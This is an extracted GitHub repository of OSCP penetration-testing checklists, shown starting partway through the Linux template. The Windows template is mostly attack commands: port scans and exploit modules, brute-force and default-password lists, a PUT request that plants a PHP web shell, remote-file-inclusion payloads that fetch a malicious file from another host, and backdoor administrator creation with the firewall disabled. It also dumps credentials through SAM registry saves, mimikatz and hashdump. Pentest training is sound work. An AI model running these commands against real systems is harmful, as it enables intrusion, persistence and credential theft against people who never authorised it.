tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
```
### Interesting files
```
#Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
.ssh:
.bash_history
```
### Databases
### SSH-Keys
### Browser
### Mail
```
/var/mail
/var/spool/mail
```
### GUI
If there is a gui we want to check out the browser.
```
echo $DESKTOP_SESSION
echo $XDG_CURRENT_DESKTOP
echo $GDMSESSION
```
## How to replicate:
================================================
FILE: templates/windows-template.md
================================================
## Info-sheet
- DNS-Domain name:
- Host name:
- OS:
- Server:
- Workgroup:
- Windows domain:
- Services and ports:
INSERTTCPSCAN
## Recon
```
Always start with a stealthy scan to avoid closing ports.
# Syn-scan
nmap -sS INSERTIPADDRESS
# Service-version, default scripts, OS:
nmap INSERTIPADDRESS -sV -sC -O
# Scan all ports, might take a while.
nmap INSERTIPADDRESS -p-
# Scan for UDP
nmap INSERTIPADDRESS -sU
unicornscan -mU -v -I INSERTIPADDRESS
# Connect to udp if one is open
nc -u INSERTIPADDRESS 48772
# Monster scan
nmap INSERTIPADDRESS -p- -A -T4 -sC
```
### Port 21 - FTP
- Name:
- Version:
- Anonymous login:
INSERTFTPTEST
```
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
```
### Port 22 - SSH
- Name:
- Version:
- Protocol:
- RSA-key-fingerprint:
- Takes-password:
If you have usernames test login with username:username
INSERTSSHCONNECT
### Port 25
- Name:
- Version:
- VRFY:
- EXPN:
INSERTSMTPCONNECT
```
nc -nvv INSERTIPADDRESS 25
HELO foo<cr><lf>
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS
```
### Port 110 - Pop3
- Name:
- Version:
INSERTPOP3CONNECT
### Port 135 - MSRPC
Some versions are vulnerable.
```
nmap INSERTIPADDRESS --script=msrpc-enum
```
Exploit:
```
msf > use exploit/windows/dcerpc/ms03_026_dcom
```
### Port 139/445 - SMB
- Name:
- Version:
- Domain/workgroup name:
- Domain-sid:
- Allows unauthenticated login:
```
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445
enum4linux -a INSERTIPADDRESS
rpcclient -U "" INSERTIPADDRESS
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
smbclient //INSERTIPADDRESS/admin$ -U john
Log in with shell:
winexe -U username //INSERTIPADDRESS "cmd.exe" --system
```
### Port 161/162 UDP - SNMP
```
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS
snmp-check -t INSERTIPADDRESS -c public
```
```
# Common community strings
public
private
community
```
### Port 554 - RTSP
### Port 1030/1032/1033/1038
Used by RPC to connect in domain network. Usually nothing.
### Port 1433 - MSSQL
- Version:
```
use auxiliary/scanner/mssql/mssql_ping
# Last options. Brute force.
scanner/mssql/mssql_login
# Log in to mssql
sqsh -S INSERTIPADDRESS -U sa
# Execute commands
xp_cmdshell 'date'
go
```
If you have credentials look in metasploit for other modules.
## Port 1521 - Oracle
Name:
Version:
Password protected:
```
tnscmd10g version -h INSERTIPADDRESS
tnscmd10g status -h INSERTIPADDRESS
```
### Port 2100 - Oracle XML DB
Can be accessed through ftp.
Some default passwords here: https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm
- Name:
- Version:
Default logins:
```
sys:sys
scott:tiger
```
### Port 2049 - NFS
```
showmount -e INSERTIPADDRESS
If you find anything you can mount it like this:
mount INSERTIPADDRESS:/ /tmp/NFS
mount -t INSERTIPADDRESS:/ /tmp/NFS
```
### 3306 - MySQL
- Name:
- Version:
```
mysql --host=INSERTIPADDRESS -u root -p
nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306
```
### Port 3339 - Oracle web interface
- Basic info about web service (apache, nginx, IIS)
- Server:
- Scripting language:
- Apache Modules:
- IP-address:
- Domain-name address:
### Port 3389 - Remote desktop
Test logging in to see what OS is running
```
rdesktop -u guest -p guest INSERTIPADDRESS -g 94%
# Brute force
ncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
```
### Port 80
- Server:
- Scripting language:
- Apache Modules:
- Domain-name address:
INSERTCURLHEADER
- Web application
- Name:
- Version:
```
# Nikto
nikto -h http://INSERTIPADDRESS
# Nikto with squid proxy
nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444
# Get header
curl -i INSERTIPADDRESS
# Get everything
curl -i -L INSERTIPADDRESS
# Check if it is possible to upload using put
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php
# Check for title and all links
dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix
```
#### Nikto scan
INSERTNIKTOSCAN
#### Url brute force
```
# Dirb
dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt
# Gobuster - remove relevant responde codes (403 for example)
gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
```
INSERTDIRBSCAN
#### Default/Weak login
Google documentation for default passwords and test them:
```
site:webapplication.com password
```
```
admin admin
admin password
admin <blank>
admin nameofservice
root root
root admin
root password
root nameofservice
<username if you have> password
<username if you have> admin
<username if you have> username
<username if you have> nameofservice
```
#### LFI/RFI
```
# Kadimus
/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=
# Bypass execution
http://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index
base64 -d savefile.php
# Bypass extension
http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00
http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt?
```
#### SQL-Injection
```
# Post
./sqlmap.py -r search-test.txt -p tfUPass
# Get
sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql
# Crawl
sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3
```
#### Sql-login-bypass
- Open Burp-suite
- Make and intercept request
- Send to intruder
- Cluster attack
- Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)
- Attack
- Check for response length variation
### Password brute force - last resort
```
cewl
```
### Port 443 - HTTPS
Heartbleed:
```
sslscan INSERTIPADDRESS:443
```
## Vulnerability analysis
Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilities and features.
### To try - List of possibilities
Add possible exploits here:
### Find sploits - Searchsploit and google
Where there are many exploits for a software, use google. It will automatically sort it by popularity.
```
site:exploit-db.com apache 2.4.7
# Remove dos-exploits
searchsploit Apache 2.4.7 | grep -v '/dos/'
searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat"
# Only search the title (exclude the path), add the -t
searchsploit -t Apache | grep -v '/dos/'
```
----------------------------------------------------------------------------
'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''
-----------------------------------------------------------------------------
## Privilege escalation
Now we start the whole enumeration-process over gain. This is a checklist. You need to check of every single one, in this order.
- Kernel exploits
- Cleartext password
- Reconfigure service parameters
- Inside service
- Program running as root
- Installed software
- Scheduled tasks
- Weak passwords
### To-try list
Here you will add all possible leads. What to try.
### Basic info
- OS:
- Version:
- Architecture:
- Current user:
- Hotfixes:
- Antivirus:
**Users:**
**Localgroups:**
```
systeminfo
set
hostname
net users
net user user1
net localgroups
accesschk.exe -uwcqv "Authenticated Users" *
netsh firewall show state
netsh firewall show config
# Set path
set PATH=%PATH%;C:\xampp\php
```
### Kernel exploits
```
# Look for hotfixes
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Search for exploits
site:exploit-db.com windows XX XX
```
### Cleartext passwords
```
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```
### Reconfigure service parameters
- Unquoted service paths
Check book for instructions
- Weak service permissions
Check book for instructions
### Inside service
Check netstat to see what ports are open from outside and from inside. Look for ports only available on the inside.
```
# Meterpreter
run get_local_subnets
netstat /a
netstat -ano
```
### Programs running as root/system
### Installed software
```
# Metasploit
ps
tasklist /SVC
net start
reg query HKEY_LOCAL_MACHINE\SOFTWARE
DRIVERQUERY
Look in:
C:\Program files
C:\Program files (x86)
Home directory of the user
```
### Scheduled tasks
```
schtasks /query /fo LIST /v
Check this file:
c:\WINDOWS\SchedLgU.Txt
```
### Weak passwords
Remote desktop
```
ncrack -vv --user george -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS
```
### Useful commands
**Add user and enable RDP**
```
net user haxxor Haxxor123 /add
net localgroup Administrators haxxor /add
net localgroup "Remote Desktop Users" haxxor /ADD
# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Turn firewall off
netsh firewall set opmode disable
Or like this
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
If you get this error:
"ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
Failed to connect, CredSSP required by server.""
Add this reg key:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
```
------------------------------------------------------------------------
----------------------------- LOOT LOOT LOOT LOOT -------------------
------------------------------------------------------------------------
## Loot
- Proof:
- Network secret:
- Password and hashes:
- Dualhomed:
- Tcpdump:
- Interesting files:
- Databases:
- SSH-keys:
- Browser:
### Proof
### Network secret
### Passwords and hashes
```
wce32.exe -w
wce64.exe -w
fgdump.exe
reg.exe save hklm\sam c:\sam_backup
reg.exe save hklm\security c:\security_backup
reg.exe save hklm\system c:\system
# Meterpreter
hashdump
load mimikatz
msv
```
### Dualhomed
```
ipconfig /all
route print
# What other machines have been connected
arp -a
```
### Tcpdump
```
# Meterpreter
run packetrecorder -li
run packetrecorder -i 1
```
### Interesting files
```
#Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
# How to cat files in meterpreter
cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt
# Recursive search
dir /s
```
### Mail
### Browser
- Browser start-page:
- Browser-history:
- Saved passwords:
### Databases
### SSH-keys
## How to replicate:
gitextract_kkjeoamh/
├── README.md
├── recon_enum/
│ └── reconscan.py
├── reports/
│ └── reports.txt
├── setup.sh
└── templates/
├── linux-template.md
└── windows-template.md
SYMBOL INDEX (17 symbols across 1 files) FILE: recon_enum/reconscan.py class bcolors (line 20) | class bcolors: function multProc (line 32) | def multProc(targetin, scanip, port): function connect_to_port (line 39) | def connect_to_port(ip_address, port, service): function write_to_file (line 70) | def write_to_file(ip_address, enum_type, data): function dirb (line 98) | def dirb(ip_address, port, url_start, wordlist="/usr/share/wordlist/dirb... function nikto (line 108) | def nikto(ip_address, port, url_start): function httpEnum (line 119) | def httpEnum(ip_address, port): function httpsEnum (line 141) | def httpsEnum(ip_address, port): function mssqlEnum (line 162) | def mssqlEnum(ip_address, port): function smtpEnum (line 173) | def smtpEnum(ip_address, port): function smbNmap (line 184) | def smbNmap(ip_address, port): function smbEnum (line 192) | def smbEnum(ip_address, port): function ftpEnum (line 200) | def ftpEnum(ip_address, port): function udpScan (line 210) | def udpScan(ip_address): function sshScan (line 221) | def sshScan(ip_address, port): function pop3Scan (line 231) | def pop3Scan(ip_address, port): function nmapScan (line 242) | def nmapScan(ip_address):
Condensed preview — 6 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (47K chars).
[
{
"path": "README.md",
"chars": 2042,
"preview": "# oscp\n\n## Reconscan.py\n\nThis script is based on the script by [Mike Czumak](http://www.securitysift.com/offsec-pwb-oscp"
},
{
"path": "recon_enum/reconscan.py",
"chars": 17877,
"preview": "#!/usr/bin/env python\nimport subprocess\nimport multiprocessing\nfrom multiprocessing import Process, Queue\nimport os\nimpo"
},
{
"path": "reports/reports.txt",
"chars": 0,
"preview": ""
},
{
"path": "setup.sh",
"chars": 267,
"preview": "#!/bin/bash\n\nfolder=$(find /home /usr /var /tmp /opt /mnt /root -type d -name recon_enum -print -quit 2>/dev/null)\necho "
},
{
"path": "templates/linux-template.md",
"chars": 12622,
"preview": "## Info-sheet\n\n- DNS-Domain name:\n- Host name:\n- OS:\n- Server:\n- Kernel:\n- Workgroup:\n- Windows domain:\n\nServices and po"
},
{
"path": "templates/windows-template.md",
"chars": 11646,
"preview": "## Info-sheet\n\n\n- DNS-Domain name:\n- Host name:\n- OS:\n- Server:\n- Workgroup:\n- Windows domain:\n- Services and ports:\n\nIN"
}
]
About this extraction
This page contains the full source code of the xapax/oscp GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 6 files (43.4 KB), approximately 12.8k tokens, and a symbol index with 17 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.